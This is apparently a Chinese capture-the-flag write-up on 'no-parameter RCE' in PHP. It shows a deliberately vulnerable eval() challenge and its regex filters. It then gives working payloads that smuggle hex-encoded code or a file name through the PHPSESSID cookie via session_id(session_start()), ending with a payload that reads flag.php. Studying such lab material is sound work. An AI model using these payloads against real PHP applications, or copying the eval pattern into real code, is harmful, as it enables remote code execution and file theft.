知识点:
无参数REC 一般有三种绕过姿势:
- gettallheaders()
- get_defined_vars()
- session_id()
参考文章:无参数RCE总结_L1am0ur的博客-CSDN博客_无参数rce
1.概念:
无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。
没有参数的函数什么意思?一般该类题目代码如下(或类似):
<?php
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp']){
eval($_GET['exp']);
}
?>
有三种绕过:这里主要讲session_id(),具体其他方法参考原文章;参考文章绝优秀,思路清晰,知识全面;
session_id必须要开启session才可以使用,所以我们要先使用session_start
所以组合起来就是:session_id(session_start())
然后,这套组合还差了点东西,还没写要执行的代码,需要在cookie里面加,用burp抓包改:
PHPSESSID=
这个值是自己设置的,一般用16进制来表示代码;比如phpinfo();
转换就是706870696e666f28293b
则一套组合下来就是:?exp=eval(hex2bin(session_id(session_start())));
cookie: PHPSESSID=706870696e666f28293b
在这道题中,首先第一个考点就是.git 源码泄露;
然后就是得到源码之后:
<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
// echo $_GET['exp'];
@eval($_GET['exp']);
}
else{
die("还差一点哦!");
}
}
else{
die("再好好想想!");
}
}
else{
die("还想读flag,臭弟弟!");
}
}
// highlight_file(__FILE__);
?>
发现是无参rce;
在第三个正则匹配中搬掉了et,则常用的绕过只剩session_id()
所以使用session_id ();
?exp=show_source(session_id(session_start()))
设置cookie:PHPSESSID=flag.php